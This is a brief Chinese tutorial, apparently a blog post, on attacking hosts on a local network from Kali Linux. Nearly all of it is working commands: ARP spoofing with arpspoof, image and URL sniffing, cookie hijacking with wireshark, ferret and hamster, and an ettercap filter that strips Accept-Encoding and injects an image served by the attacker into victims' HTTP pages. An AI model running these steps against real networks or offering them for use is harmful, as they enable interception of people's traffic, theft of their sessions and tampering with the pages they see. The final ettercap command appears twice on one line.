kali内网攻击-arpspoof

介绍
arpspoof是一款arp欺骗攻击工具


准备阶段:
查看物理机IP地址,将kali的IP地址设置为和物理机同一网段。
虚拟机网络适配器设置为桥接模式(复制物理网络连接状态)
虚拟网络编辑器在管理员模式下启动后,设置VMnet0为桥接模式,外部链接选择物理机网卡。

开启端口转发:
echo 1 > /proc/sys/net/ipv4/ip_forward

主机探测:
windows工具:Advanced IP Scanner
kali命令:fping -g 192.168.0.1/24

开启arp欺骗
arpspoof -i eth0 -t 192.168.0.1 192.168.0.10
前者为网关或路由器,后者为嗅探目标

图片嗅探

只支持http

 driftnet -i eth0

开始嗅探

获取浏览网站
urlsnarf -i eth0

Cookie劫持
打开wareshark抓包

 wireshark

过一段时间后停止抓包,保存文件,另存为pcap格式

 ferret -r 1.pcap

 hamster

架设代理服务器

打开浏览器,代理127.0.0.1:1234
访问127.0.0.1:1234
获得cookie信息

中间人攻击
kali启动apache:

service apache2 start

IP地址为192.168.188.63

主目录:/var/www/html/

将图片放入主目录下,命名为test.jpg

创建filter文件:

 vim /filter

添加:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("src=", "img src=\"http://192.168.188.63/test.jpg\" ");
   replace("SRC=", "img src=\"http://192.168.188.63/test.jpg\" ");
   msg("IMG Replace Success\n");
}

转换为二进制文件:

 etterfilter /filter -o /filter.ef

攻击:

 ettercap -T -q -F /filter.ef  -M ARP /目标IP///     ettercap -T -q -F /filter.ef  -M ARP /目标IP///